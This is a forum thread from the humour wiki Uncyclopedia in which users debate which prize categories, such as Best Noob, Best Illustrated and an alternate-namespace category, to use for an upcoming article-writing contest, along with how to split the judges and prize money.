    //  This is a stable class, and may not change except for emergencies. It
    //  is provided in stable builds.
    //  This class has draft methods, which may change over time. They are not
    //  in stable releases, by default. Use --enable-drafts to enable.

    //  Destroy an actor.
    CZMQ_EXPORT void
        zactor_destroy (zactor_t **self_p);

    //  Receive a zmsg message from the actor.
    //  Caller owns return value and must destroy it when done.
    CZMQ_EXPORT zmsg_t *
        zactor_recv (zactor_t *self);

    #ifdef CZMQ_BUILD_DRAFT_API
    //  Function to be called on zactor_destroy. Default behavior is to send
    //  zmsg_t with string "$TERM" in a first frame.
    //
    //  An example - to send $KTHXBAI string
    //
    //      if (zstr_send (self, "$KTHXBAI") == 0)
    //          zsock_wait (self);
    typedef void (zactor_destructor_fn) (
        zactor_t *self);

    //  *** Draft method, for development use, may change without warning ***
    //  Change default destructor by custom function. Actor MUST be able to
    //  handle new message instead of default $TERM.
    CZMQ_EXPORT void
        zactor_set_destructor (zactor_t *self, zactor_destructor_fn destructor);
    #endif // CZMQ_BUILD_DRAFT_API

A zactor_t instance acts like a zsock_t, and you can pass it to CZMQ methods that accept a zsock_t, including those in zstr, zmsg, and zpoller. (zloop somehow escaped and needs catching.)
An actor function MUST call zsock_signal (pipe) when initialized and MUST listen to pipe and exit on $TERM command.
Example
From zactor_test method
    zactor_t *actor = zactor_new (echo_actor, "Hello, World");
    assert (actor);
    zstr_sendx (actor, "ECHO", "This is a string", NULL);
    char *string = zstr_recv (actor);
    assert (streq (string, "This is a string"));
    freen (string);
    zactor_destroy (&actor);

    //  custom destructor
    //  KTHXBAI_actor ends on "$KTHXBAI" string
    zactor_t *KTHXBAI = zactor_new (KTHXBAI_actor, NULL);
    assert (KTHXBAI);
    //  which is the one sent by KTHXBAI_destructor
    zactor_set_destructor (KTHXBAI, KTHXBAI_destructor);
    zactor_destroy (&KTHXBAI);

    //  custom destructor
    //  destructor using bsend/brecv
    zactor_t *BSEND = zactor_new (BSEND_actor, NULL);
    assert (BSEND);
    zactor_set_destructor (BSEND, BSEND_destructor);
    zactor_destroy (&BSEND);
What you want is unsafeLazySequenceIO, which uses unsafeInterleaveIO under the hood, which is IO-specific. As always, lazy I/O is probably a bad idea and you should write a coroutine-based combinator for that. The simplest way is the ad-hoc way:

    pollEvent_ = do
        ev <- pollEvent
        case ev of
            NoEvent -> pollEvent_
            _       -> return ev

The coroutine-based method would look something like this:

    import Control.Monad.Trans.Free  -- from the 'free' package

    newtype AppF a = AppF (Event -> a)
    type App = FreeT AppF IO

Since FreeT is effectively just Coroutine from the monad-coroutine package, you can use that one instead with the 'Await Event' functor, but the 'free' package provides a lot more useful instances. Your main loop can then suspend to ask for the next event, and the surrounding application can provide the event in whatever way it wishes (for example ignoring NoEvent):

    myLoop = do
        ev <- await
        case ev of
            Quit -> return ()
            _    -> doSomethingWith ev

By the way, if your application is non-continuously rendered, which is suggested by your ignoring of NoEvent, you shouldn't use pollEvent at all. Rather you should use waitEvent, which blocks instead of returning NoEvent. That way you don't waste precious CPU cycles. The pollEvent action is meant for applications that are continuously rendered, where you would e.g. perform drawing when you get NoEvent.

Hope this helps.
1 Building a simple spin gate in C++
The simplest atomic boolean is the std::atomic_flag. It’s guaranteed by standard to be lock free. Unfortunately, to provide that guarantee, it provides no way to do an atomic read or write to the flag, just a clear, and a set and return prior value. This isn’t rich enough for multiple threads to wait, although it is enough to implement a spinlock.
std::atomic<bool> isn’t guaranteed to be lock free, but in practice, any architecture I’m interested has at least 32bit aligned atomics that are lock free. Older hardware, such as ARMv5, SparcV8, and 80386 are missing cmpxchg, so loads are generally implemented with a lock in order to maintain the guarantees if there were a simultaneous load and exchange. See, for example, LLVM Atomic Instructions and Concurrency Guide. Modern ARM, x86, Sparc, and Power chips are fine.
When the spin gate is constructed, we’ll mark the gate as closed. Threads will then wait on the flag, spinning until the gate is opened. For this we use Release-Acquire ordering between the open and wait. This will ensure any stores done before the gate is opened will be visible to the thread waiting.
    // spingate.h                                                  -*-C++-*-
    #ifndef INCLUDED_SPINGATE
    #define INCLUDED_SPINGATE

    #include <atomic>
    #include <thread>

    class SpinGate
    {
        std::atomic_bool flag_;

      public:
        SpinGate();
        void wait();
        void open();
    };

    inline SpinGate::SpinGate()
    {
        // Close the gate
        flag_.store(true, std::memory_order_release);
    }

    inline void SpinGate::wait()
    {
        while (flag_.load(std::memory_order_acquire))
            ; // spin
    }

    inline void SpinGate::open()
    {
        flag_.store(false, std::memory_order_release);
        std::this_thread::yield();
    }

    #endif
#include "spingate.h" // Test that header is complete by including
Using a SpinGate is fairly straightfoward. Create an instance of SpinGate and wait() on it in each of the worker threads. Once all of the threads are created, open the gate to let them run. In this example, I sleep for one second in order to check that none of the worker threads get past the gate before it is opened.
The synchronization is on the SpinGate's std::atomic_bool, flag_. The flag_ is set to true in the constructor, with release memory ordering. The function wait() spins on loading the flag_ with acquire memory ordering, until open() is called, which sets the flag_ to false with release semantics. The other threads that were spinning may now proceed. The release-acquire ordering ensures that happens-before writes by the thread setting up the work and calling open will be read by the threads that were spin waiting.
1.1 Update:
    #include "spingate.h"

    #include <vector>
    #include <chrono>
    #include <thread>
    #include <iostream>

    int main()
    {
        std::vector<std::thread> workers;
        SpinGate gate;

        using time_point = std::chrono::time_point<std::chrono::high_resolution_clock>;
        time_point t1;
        auto threadCount = std::thread::hardware_concurrency();
        std::vector<time_point> times;
        times.resize(threadCount);

        for (size_t n = 0; n < threadCount; ++n) {
            workers.emplace_back([&gate, t1, &times, n]{
                gate.wait();
                time_point t2 = std::chrono::high_resolution_clock::now();
                times[n] = t2;
            });
        }

        std::cout << "Open the gate in 1 second: " << std::endl;
        using namespace std::chrono_literals;
        std::this_thread::sleep_for(1s);
        t1 = std::chrono::high_resolution_clock::now();
        gate.open();

        for (auto& thr : workers) {
            thr.join();
        }

        int threadNum = 0;
        for (auto& time: times) {
            auto diff = std::chrono::duration_cast<std::chrono::nanoseconds>(time - t1);
            std::cout << "Thread " << threadNum++ << " waited " << diff.count() << "ns\n";
        }
    }
I’d originally had the body of the threads just spitting out that they were running on std::cout, and the lack of execution before the gate, plus the overlapping output, being evidence of the gate working. That looked like:
    for (std::size_t n = 0; n < std::thread::hardware_concurrency(); ++n) {
        workers.emplace_back([&gate, n]{
            gate.wait();
            std::cout << "Output from gated thread " << n << std::endl;
        });
    }
The gate is captured in the thread lambda by reference, the thread number by value, and when run, overlapping gibberish is printed to the console as soon as open() is called.
But then I became curious about how long the spin actually lasted. Particularly since the guarantees for atomics with release-acquire semantics, or really even sequentially consistent, are about once a change is visible, that changes before are also visible. It’s really a function of the underlying hardware how fast the change is visible, and what are the costs of making the happened-before writes available. I’d already observed better overlapping execution using the gate, as opposed to just letting the threads run, so for my initial purposes of making contention more likely, I was satisfied. Visibility, on my lightly loaded system, seems to be in the range of a few hundred to a couple thousand nanoseconds, which is fairly good.
Checking how long it took to start let me do two thing. First, play with the new-ish chrono library. Second, check that the release-acquire sync is working the way I expect. The lambdas that the threads are running capture the start time value by reference. The start time is set just before the gate is opened, and well after the threads have started running. The spin gate’s synchronization ensures that if the state change caused by open is visible, the setting of the start time is also visible.
Here are one set of results from running a spingate:
    Open the gate in 1 second:
    Thread 0 waited 821ns
    Thread 1 waited 14490ns
    Thread 2 waited 521ns
    Thread 3 waited 817ns
2 Comparison with Condition Variable gate
    // cvgate.h                                                    -*-C++-*-
    #ifndef INCLUDED_CVGATE
    #define INCLUDED_CVGATE

    #include <mutex>
    #include <condition_variable>
    #include <atomic>
    #include <thread>

    class CVGate
    {
        std::mutex lock_;
        std::condition_variable cv_;
        bool flag_;

      public:
        CVGate();
        void wait();
        void open();
    };

    inline CVGate::CVGate()
    : lock_(),
      cv_(),
      flag_(true)
    {}

    inline void CVGate::wait()
    {
        std::unique_lock<std::mutex> lk(lock_);
        cv_.wait(lk, [&](){ return !flag_; });
    }

    inline void CVGate::open()
    {
        std::unique_lock<std::mutex> lk(lock_);
        flag_ = false;
        cv_.notify_all();
        std::this_thread::yield();
    }

    #endif
#include "cvgate.h" // Test that header is complete by including
This has the same interface as SpinGate, and is used exactly the same way.
Running it shows:
    Open the gate in 1 second:
    Thread 0 waited 54845ns
    Thread 1 waited 76125ns
    Thread 2 waited 91977ns
    Thread 3 waited 128816ns
That shows the overhead of the mutex and condition variable is significant. On the other hand, the system load while it's waiting is much lower. Spingate will use all available CPU, while CVGate yields, so useful work can be done by the rest of the system.
However, for the use I was originally looking at, releasing threads for maximal overlap, spinning is clearly better. There is much less overlap as the cv blocked threads are woken up.
3 Building and Running
    cmake_minimum_required(VERSION 3.5)
    set(CMAKE_LEGACY_CYGWIN_WIN32 0)

    project(SpinGate C CXX)

    set(THREADS_PREFER_PTHREAD_FLAG ON)
    find_package(Threads REQUIRED)

    set(CMAKE_EXPORT_COMPILE_COMMANDS ON)
    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++14 -ftemplate-backtrace-limit=0")
    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wall -Wextra -march=native")
    set(CMAKE_CXX_FLAGS_DEBUG "-O0 -fno-inline -g3")
    set(CMAKE_CXX_FLAGS_RELEASE "-Ofast -g0 -DNDEBUG")

    include_directories(${CMAKE_CURRENT_SOURCE_DIR})

    add_executable(spingate main.cpp spingate.cpp)
    add_executable(cvgate cvmain.cpp cvgate.cpp)
    target_link_libraries(spingate Threads::Threads)
    target_link_libraries(cvgate Threads::Threads)
And here we build a release version of the test executable:
    mkdir -p build
    cd build
    cmake -DCMAKE_BUILD_TYPE=Release ../
    make
    -- Configuring done
    -- Generating done
    -- Build files have been written to: /home/sdowney/src/spingate/build
    [ 50%] Built target cvgate
    [100%] Built target spingate
Setting up a React application requires a lot. Learn how to bootstrap a React project without the complexities!
UI Styling
In ReactJS projects, you can create custom stylesheets and UI Components. A developer that's looking to rapidly build an application might not have time to create UI components from scratch. The community has blessed us with two popular libraries that possess ready-made UI components for use in your application. React-Bootstrap has all of the bootstrap features written purely as reusable React Components. Material-UI is a set of React Components that implement Google's Material Design.
Material UI
React Bootstrap
Material UI Code Example
    import React from 'react';
    import RaisedButton from 'material-ui/RaisedButton';

    const MyAwesomeReactComponent = () => (
      <RaisedButton label="Default" />
    );

    export default MyAwesomeReactComponent;
One effective way of bootstrapping your ReactJS project is to start by designing your UI components and then glue them together, that way you can split up the initial setup effort into several small parts along the project lifecycle. Pure UI explains this in detail. I also recommend these tools: Carte-blanche, React Storybook, uiharness.com. They will help a lot!
Network Requests
In a situation where you have to fetch data from an external API e.g calling the Github API in your ReactJS application, there are several tools you can use. I highly recommend axios and superagent.
HTTP Request Example With Axios
    import axios from 'axios';

    function getRepos(username) {
      return axios.get(`https://api.github.com/users/${username}/repos`);
    }

    function getUserInfo(username) {
      return axios.get(`https://api.github.com/users/${username}`);
    }

    const helpers = {
      getGithubInfo(username) {
        return axios.all([getRepos(username), getUserInfo(username)])
          .then(arr => ({
            repos: arr[0].data,
            bio: arr[1].data
          }));
      }
    };

    export default helpers;
This is a helper utility that you can now call and render out in different ReactJS components within your app.
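The heart of that helper is combining two in-flight requests. The same pattern can be sketched with plain `Promise.all` and stubbed fetchers — the stub names and data below are invented for illustration, standing in for the real axios calls:

```javascript
// Stub fetchers standing in for axios.get; the shapes mimic axios
// responses ({ data: ... }) but the values are made up.
function getRepos(username) {
  return Promise.resolve({ data: [{ name: username + '-demo-repo' }] });
}

function getUserInfo(username) {
  return Promise.resolve({ data: { login: username, bio: 'hacker' } });
}

// Same combining logic as the helper above: fire both requests in
// parallel and merge the results into one object.
function getGithubInfo(username) {
  return Promise.all([getRepos(username), getUserInfo(username)])
    .then(([repos, user]) => ({
      repos: repos.data,
      bio: user.data
    }));
}

getGithubInfo('octocat').then(info => {
  console.log(info.bio.login); // 'octocat'
});
```

A component would call this in `componentDidMount` and push the merged object into state before rendering it.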
Flux Pattern - State Management
Flux is an application architecture for React that utilizes a unidirectional flow for building client-side web applications. With Flux, when a user interacts with a React view, the view propagates an action through a central dispatcher, to the various stores that hold the application's data and business logic, which updates all of the views that are affected. When choosing a dispatcher for your app, Facebook's dispatcher library should come in handy. It's easy to instantiate and use. Alongside this library, you will need any good Javascript event library. NodeJS EventEmmiter module is a good option. You can install flux from npm, the dispatcher will be immediately available via
    var Dispatcher = require('flux').Dispatcher;

More details about the Flux pattern can be found here.
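The unidirectional flow Flux describes can be sketched without any library at all: a dispatcher is essentially a registry of store callbacks that every action passes through. This is an illustrative toy, not Facebook's Dispatcher API:

```javascript
// Minimal stand-in for a Flux dispatcher: stores register callbacks,
// and every dispatched action is forwarded to all of them.
function createDispatcher() {
  const callbacks = [];
  return {
    register(callback) {
      callbacks.push(callback);
      return callbacks.length - 1; // a token, like Flux's dispatch tokens
    },
    dispatch(action) {
      callbacks.forEach(cb => cb(action));
    }
  };
}

// A toy "store" that keeps a counter and reacts to actions.
const dispatcher = createDispatcher();
let count = 0;
dispatcher.register(action => {
  if (action.type === 'INCREMENT') count += 1;
});

dispatcher.dispatch({ type: 'INCREMENT' });
dispatcher.dispatch({ type: 'INCREMENT' });
console.log(count); // 2
```

In a real app the views would emit those actions and the stores would emit change events back to the views, closing the one-way loop.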
Redux
Redux evolves the idea of Flux. It's a state management library with a minimal API but completely predictable behavior, so it is possible to implement logging, hot reloading, time travel, universal apps, record and replay, without any buy-in from the developer. You can also install it via NPM like so:
npm install redux redux-devtools --save. Redux attempts to make state mutations predictable by imposing certain restrictions on how and when updates can happen. Redux has three fundamental principles:
- Single source of truth
- State is read-only
- Changes are made with pure functions
Read more about Redux here. Here is also an awesome list of Redux examples and middlewares. Another alternative for state management within your ReactJS application is Alt. More information about Alt here.
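Those three principles are easiest to see in code. Below is a toy, library-free sketch of the idea — a single state tree, readable but only changeable through dispatched actions, and a pure reducer describing the changes (the real `createStore` comes from the `redux` package and does more):

```javascript
// A pure reducer: (state, action) -> new state, never mutating.
function counter(state = 0, action) {
  switch (action.type) {
    case 'INCREMENT': return state + 1;
    case 'DECREMENT': return state - 1;
    default: return state;
  }
}

// Toy store holding the single source of truth.
function createStore(reducer) {
  let state = reducer(undefined, { type: '@@INIT' });
  return {
    getState: () => state,                               // state is read-only
    dispatch: action => { state = reducer(state, action); } // only way to change it
  };
}

const store = createStore(counter);
store.dispatch({ type: 'INCREMENT' });
store.dispatch({ type: 'INCREMENT' });
store.dispatch({ type: 'DECREMENT' });
console.log(store.getState()); // 1
```

Because the reducer is pure, the same action log always replays to the same state, which is what makes logging, time travel, and record/replay possible.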
Authentication
Authentication is an important part of any application. The best way to do user authentication for single page apps is via JSON Web Tokens (JWT). A typical authentication flow is this:
- A user signs up/logs in, generate JWT token and return it to the client
- Store the JWT token on the client and send it via headers/query parameters for future requests
Authentication flow
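Step two of that flow — sending the stored token with every request — reduces to a small helper. A minimal sketch, where the token value and the in-memory storage object are placeholders (a real app would use `localStorage` and attach the headers to its axios/superagent calls):

```javascript
// Toy in-memory "storage" standing in for localStorage on the client.
const storage = {};

function saveToken(token) {
  storage.jwt = token;
}

// Build the headers for an authenticated request; 'Bearer <token>'
// is the conventional Authorization scheme for JWTs.
function authHeaders() {
  return storage.jwt
    ? { Authorization: 'Bearer ' + storage.jwt }
    : {};
}

saveToken('abc.def.ghi'); // a made-up token, not a real JWT
console.log(authHeaders().Authorization); // 'Bearer abc.def.ghi'
```

The server then verifies the token's signature on each request instead of keeping session state.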
A comprehensive example of adding authentication to a ReactJS app is here. Using Redux? Here is a good example of setting up authentication in your ReactJS application.
Implementing Authentication with Auth0
Multifactor authentication, single sign-on, and passwordless login are also a breeze with Auth0.
With Auth0, you can add authentication to any app in under 10 minutes and implement features like social login, multifactor auth, and single sign-on at the flip of a switch. It is the easiest way to add authentication to your app!
A full implementation of Authentication with Auth0 in a ReactJS application is here.
Data Persistence
Without a backend, you can persist data in your Single Page App by using Firebase. In a Reactjs app, all you simply need is ReactFire. It is a ReactJS mixin for easy Firebase integration. With ReactFire, it only takes a few lines of JavaScript to integrate Firebase data into React apps via the ReactFireMixin.
npm install reactfire react firebase --save
TodoList Example
    import React from 'react';

    class TodoList extends React.Component {
      render() {
        var _this = this;
        var createItem = (item, index) => {
          return (
            <li key={ index }>
              { item.text }
              <span onClick={ _this.props.removeItem.bind(null, item['.key']) }>
                X
              </span>
            </li>
          );
        };
        return <ul>{ this.props.items.map(createItem) }</ul>;
      }
    }

    class TodoApp extends React.Component {
      constructor(props, context) {
        super(props, context);
        this.state = { items: [], text: '' };
        // Bind handlers once; ES6 class methods are not autobound
        this.onChange = this.onChange.bind(this);
        this.handleSubmit = this.handleSubmit.bind(this);
      }

      componentWillMount() {
        this.firebaseRef = firebase.database().ref('todoApp/items');
        this.firebaseRef.limitToLast(25).on('value', function(dataSnapshot) {
          var items = [];
          dataSnapshot.forEach(childSnapshot => {
            const item = childSnapshot.val();
            item['.key'] = childSnapshot.key;
            items.push(item);
          });
          this.setState({ items: items });
        }.bind(this));
      }

      componentWillUnmount() {
        this.firebaseRef.off();
      }

      onChange(e) {
        this.setState({ text: e.target.value });
      }

      removeItem(key) {
        var firebaseRef = firebase.database().ref('todoApp/items');
        firebaseRef.child(key).remove();
      }

      handleSubmit(e) {
        e.preventDefault();
        if (this.state.text && this.state.text.trim().length !== 0) {
          this.firebaseRef.push({ text: this.state.text });
          this.setState({ text: '' });
        }
      }

      render() {
        return (
          <div>
            <TodoList items={ this.state.items } removeItem={ this.removeItem } />
            <form onSubmit={ this.handleSubmit }>
              <input onChange={ this.onChange } value={ this.state.text } />
              <button>{ 'Add #' + (this.state.items.length + 1) }</button>
            </form>
          </div>
        );
      }
    }

    ReactDOM.render(<TodoApp />, document.getElementById('todoApp'));
More information about persisting your data using ReactFire here.
Testing
Most projects become a mountain of spaghetti code at some point during development due to lack of solid tests or no tests at all. ReactJS apps are no different, but this can be avoided if you know some core principles. When writing tests for ReactJS code, it is helpful to pull out any functionality that doesn't have to do with any UI components into separate modules, so that they can be tested separately. Tools for unit testing those functionalities are mocha, expect, chai, jasmine.
Testing becomes tricky in a ReactJS application when you have to deal with components. How do you test stateless components? How do you test components with state? Now, ReactJS provides a nice set of test utilities that allow us to inspect and examine the components we build. A particular concept worthy of mention is Shallow Rendering. Instead of rendering into a DOM the idea of shallow rendering is to instantiate a component and get the result of its render method. You can also check its props and children and verify they work as expected. More information here.
Facebook uses Jest to test React applications. AirBnB uses Enzyme. When bootstrapping your ReactJS application, you can set up any of these awesome tools to implement testing.
Generators and Boilerplates
A lot of tools have been mentioned in this post in relation to setting up different parts of a ReactJS app. If you don't intend writing your app from scratch, there are lots of generators and boilerplates that tie all these tools together to give you a great starting point for your app. One fantastic example is React Starter Kit. It has a Yeoman generator. It's an isomorphic web app boilerplate that contains almost everything you need to build a ReactJS app. Another boilerplate is React Static boilerplate, it helps you build a web app that can be hosted directly from CDNs like Firebase and Github Pages. Other alternatives are React redux starter kit and React webpack generator. Recently, a nice and effective tool called
create-react-app was released by the guys at Facebook. It's a CLI tool that helps create React apps with no build configuration!
Conclusion
There are several tools that will help bootstrap your React app, we looked at a couple that we consider quite good and will have your application up and running in no time. But feel free to search for your own tools, and if you think that we are missing something, let us know in the comments. Setting up a React project should be painless!
"Setting up a React project should be painless!"
TWEET THIS | https://auth0.com/blog/bootstrapping-a-react-project/ | CC-MAIN-2017-04 | refinedweb | 1,416 | 50.23 |
Hey:
- Get the “Measure Ups.” I’ve been using the Microsoft Press Self-Paced Training Kit books for all my Microsoft exams, but one thing to note with a book that was published over 5 years ago is that the practice questions that come with it are going to be quite different to the questions you will actually get in your exam because Microsoft is always updating the questions in the light of technology changes and software revisions (e.g., Service Packs 1 and 2, and R2). I’m sure Microsoft won’t mind me mentioning MeasureUp.com, which currently has a 40% discount offer on their practice tests, using code “MUP1009”, which expires at the end of October 2009, so hurry!
- Get to know and love structural/architectural diagrams of Active Directory, including the triangles for domains, circles for Organisational Units, etc. They use these liberally in the exam and if you’re not 100% happy with this visual convention, you will be at a disadvantage. I’ll be honest: when I used to see these diagrams I was put in mind of Quality Street, especially the “Noisette Triangle” for domains! But this is the way to represent the various components of Active Directory and that’s that! I first of all downloaded the Microsoft Active Directory Topology Diagrammer, and second I availed myself of the Windows Server TechCenter pages, including this article, “Active Directory Logical Structure Background Information.”
- Set-up a virtual lab. When my peers were studying for their MCSE exams on Windows 2000 and 2003 a few years ago, they had to find spare hardware to install trial versions of Windows Server on, but now, we can all easily make study labs using virtualisation, so there’s no excuse for us now! I made a small study lab comprising a couple of sites, a couple of domains, and a few domain controllers, and then I did all the practices from the books. This was invaluable in my studies and I highly recommend this to you for the “70-294” exam in particular, as in my opinion it is the exam that most closely focuses on your real-life abilities.:
- You need to implement different domain-level security policies, such as password policies or account lockout policies: I need to remember I’m talking about Windows Server 2003, as you may or may not know that this limitation has now been removed from Windows Server 2008.
- You need to provide decentralised administration.
- You need to optimise replication across WAN links more than you can with sites.
- You need to provide different namespaces.
- You need to retain existing Windows NT domains.
- You want to put the Schema master in a different domain to account or resource domains.. | https://blogs.msdn.microsoft.com/microsoft_press/2009/10/26/andrew-levicki-if-at-first-you-dont-succeed-try-again-for-goodness-sake/ | CC-MAIN-2016-36 | refinedweb | 459 | 57.4 |
NOTICE: The following is not intended for real-world application. It is just an intellectual exercise to minimize the size of the program. The generated PE file may or may not be valid as it depends on behavior of specific architecture, OS and toolset.
Nowadays, the size of the program is no longer a big issue. But it is still very interesting to write program with extremely small size.
Here, I'll limit the discussion on X86 + WinXP + PE format to simplify the analysis. And I choose VC9 as our C++ compiler. The target program reads the number of queries first, then calculates the digest for each query and outputs the result.
If you use the default setting to compile the code, you will get an executable of size 56320 bytes.
cl /c test.cpplink test.obj
That is small, right? But most of the code in the executable is not yours. By default, the compiler will statically link to the CRT library, so they will reside in your program. We'd better get rid of these stuff. Let's add /MD flag to cl.exe. WOW! test.exe is only 5632 bytes now! But that is not the end of the story, we can decrease the size even further.
If you check the file generated, you can still find lots of stuff not belong to you. For example, the entry point procedure "start" is added "magically" by the compiler to initialize the CRT (you can check the source code of this function in Microsoft Visual Studio 9.0\VC\crt\src\crt0.c). In our program, these work can be safely ignored. We can pass /entry:"main" flag to tell the linker to use our main function as the entry point directly. Unfortunately, you will get the following linker errors if you do that:
MSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__TerminateProcess@8 referenced in function ___report_gsfailureMSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__GetCurrentProcess@0 referenced in function ___report_gsfailureMSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__UnhandledExceptionFilter@4 referenced in function ___report_gsfailureMSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__SetUnhandledExceptionFilter@4 referenced in function ___report_gsfailureMSVCRT.lib(gs_report.obj) : error LNK2019: unresolved external symbol __imp__IsDebuggerPresent@0 referenced in function ___report_gsfailure
Don't worry. That is what /GS flag does, and we will discuss it later. Here we simply pass kernel32.lib to link.exe to resolve the failure. The size of test.exe is now 3072 bytes.
/GS is used to detect buffer overrun, and is on by default. This flag is very useful for real-world application, but our program will not take the potential buffer overrun into consideration here. So we turn it off by passing /GS- to cl.exe and test.exe decrease to 2560 bytes!
There are no redundant code now, and we can focus on other stuff in our program. In PE format, different sections are used to store different kinds of data. For example, VC store code into ".text" and data into ".data". Each section will align to the 512-byte boundary in the file. That is why all the previous size of test.exe are multiply of 512. We can merge them to save the space (this is not safe for real-world application and may cause problems). These flags for link.exe are what we need: /MERGE:.rdata=.text /MERGE:.data=.text. We will then have test.exe of 1536 bytes!
With /O1 for cl.exe (minimize size), we can decrease the size to 1024 bytes. After loosing the section alignment requirement to 4 by linker flag /ALIGN:4 (again, this is not safe for real-world application and may cause problems), we achieve the size of 896.
All of these tunings are high level, and finally we decrease the size of the original exe by more than 98%!
cl /O1 /MD /GS- /c test.cpplink test.obj /entry:"main" /MERGE:.rdata=.text /MERGE:.data=.text /ALIGN:4
BTW: If the main is completely empty, the above flag setting can generate a program of only 468 bytes. That is the lower bound of high level size optimization. To go even further, we have to resort to low level approach. That will be described in the next post.
The program:
#include <cstdio>#include <cstring>static unsigned char Tbl[9]={1,1,2,3,7,5,6,4,8};int main(){ unsigned char BufT[0x401]; int n; scanf("%d",&n); for (;n>0;--n) { scanf("%s",BufT); unsigned long keyT[4]={0xCBDCEDFE,0x8798A9BA,0x43546576,0x00102132}; unsigned char *Buf=BufT; int tt; while (tt=*Buf++) { { int t=Tbl[tt%9]; for (int k=0;k<4;++k) keyT[k]=keyT[k]*t+0xFBFC; } unsigned long Buf1[4]; int t=tt&0xF; memcpy(Buf1,(char *)keyT+t,0x10-t); memcpy((char *)Buf1+0x10-t,keyT,t); memcpy(keyT,Buf1,16); } for (size_t k=0;k<4;++k) printf("%08X",keyT[k]); printf("\n"); } return 0;} | http://blogs.msdn.com/b/xiangfan/archive/2008/09/19/minimize-the-size-of-your-program-high-level.aspx | CC-MAIN-2015-11 | refinedweb | 825 | 68.26 |
isoweek 1.2.0
Objects representing a week
The isoweek module provide the class Week. Instances represent specific weeks spanning Monday to Sunday. There are 52 or 53 numbered weeks in a year. Week 1 is defined to be the first week with 4 or more days in January.
It's called isoweek because this is the week definition of ISO 8601. This standard also define a notation for identifying weeks; YYYYWww (where the "W" is a literal). An example is "2011W08" which denotes the 8th week of year 2011. Week instances stringify to this form.
The Week instances are light weight and immutable with an interface similar to the datetime.date objects. Example code:
from isoweek import Week w = Week(2011, 20) print "Week %s starts on %s" % (w, w.monday()) print "Current week number is", Week.thisweek().week print "Next week is", Week.thisweek() + 1
Reference
Constructor:
- class isoweek.Week(year, week)
All arguments are required. Arguments should be ints.
If the week number isn't within the range of the given year, the year is adjusted to make week number within range. The final year must be within range 1 to 9999. If not ValueError is raised.
Other constructors, all class methods:
- classmethod Week.thisweek()
- Return the current week (local time).
- classmethod Week.fromordinal(ordinal)
- Return the week corresponding to the proleptic Gregorian ordinal, where January 1 of year 1 starts the week with ordinal 1.
- classmethod Week.fromstring(isostring)
- Return a week initialized from an ISO formatted string like "2011W08" or "2011-W08". Note that weeks always stringify back in the former and more compact format.
- classmethod Week.withdate(date)
- Return the week that contains the given datetime.date.
- classmethod Week.weeks_of_year(year)
- Returns an iterator over the weeks of the given year.
- classmethod Week.last_week_of_year(year)
- Returns the last week of the given year.
Instance attributes (read-only):
- Week.year
- Between 1 and 9999 inclusive.
- Week.week
- Between 1 and 53 inclusive (52 for most years).
Supported operations:
Instance methods:
- Week.replace(year, week)
- Return a Week with the same value, except for those parameters given new values by whichever keyword arguments are specified.
- Week.toordinal()
- Return the proleptic Gregorian ordinal the week, where January 1 of year 1 starts the first week.
- Week.day(num)
- Return the given day of week as a datetime.date object. Day 0 is Monday.
- Week.monday(), Week.tuesday(),.. Week.sunday()
- Return the given day of week as a datetime.date object.
- Week.isoformat()
- Return a string representing the week in ISO 8610 format, "YYYYWww". For example Week(2011, 8).isoformat() == '2011W08'.
- Week.__str__()
- For a Week w, str(w) is equivalent to w.isoformat()
- Week.__repr__()
- Return a string like "isoweek.Week(2011, 2)".
- Author: Gisle Aas
- License: BSD
- Categories
- Development Status :: 5 - Production/Stable
- Intended Audience :: Developers
- License :: OSI Approved :: BSD License
- Operating System :: OS Independent
- Programming Language :: Python
- Programming Language :: Python :: 2.6
- Programming Language :: Python :: 2.7
- Programming Language :: Python :: 3
- Topic :: Software Development :: Libraries :: Python Modules
- Package Index Owner: gisle
- DOAP record: isoweek-1.2.0.xml | http://pypi.python.org/pypi/isoweek/1.2.0 | crawl-003 | refinedweb | 513 | 60.41 |
Forum:PLS Category Discussion
From Uncyclopedia, the content-free encyclopedia
Alright, after seeing the other thread, I've decided to do 4 categories again, but I'm looking to you guys (God knows why) for input as to exactly what the 4 categories should be. We've got the old standbyes:
- Best Article
- Best Rewrite
- Best Illustrated
- Best Noob Article
And we have some new ideas
- Best Alternate Namespace Article
- Best Voice Article
- Best First Person Article
- Best Encyclopedic
- Best Article About a Historical Event (If you like the choice, provide some ideas for historical events too, so I don't have to dream them up myself)
- Best Whateveryoucanmakeup
I, personally, would like to see Best Noob replaced with another option, because I don't feel that the overall quality in that category is necessarily worth the expenditure. But what the hell do I know, that's why I'm putting up to you guys. Should Best Noob stay? Ideally, I would have went with 5 categories, but so far we're sitting at 10 judges, and at 3 a category, that would leave us 2 short, which isn't that bad. I can probably browbeat at least one or two other people into judging, and I can always do one myself if need be. I'd like some input on this because ideally I want to get the categories sorted out and the judges selected this weekend, so we can get the writing portion of the contest started shortly. And remember, don't starting writing yet, or else you'll be disqualified and we'll have to send someone after you. Someone like...Braydie. Sir ENeGMA (talk) GUN WotM PLS 03:09, 23 June 2007 (UTC)
Talk Amongst Yourselves
I say we stick with Best Article, Best Rewrite, and Best Noob Article, but with the 4th spot we now use Best Article Made in an Alternate Namespace. --
TKFUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUCK
03:11, 23 June 2007 (UTC)
- The only thing with that is, the Potatochopping crowd fought hard for Best Illustrated, and I'm sure they'll be loth to give it up. Plus, I think that the overall quality of Best Illustrated is higher, generally, then Best Noob. But I really do like the alternate namespace idea, I think it would add some creativity. Sir ENeGMA (talk) GUN WotM PLS 03:13, 23 June 2007 (UTC)
- Maybe we should shake things up a bit... Four Categories with the winner receiving $25 and then a "Best Potatoshopped Image" contest, with the winner getting $10 or $15 or whatever..., 23 June 2007 (UTC)
- Well, my original idea was to do 5 categories and split the money that way, but so far we've got judges for 4 articles, and so that seems to be what we're gonna go with. The only problem with adding something else is finding more judges. Sir ENeGMA (talk) GUN WotM PLS 20:06, 23 June 2007 (UTC)
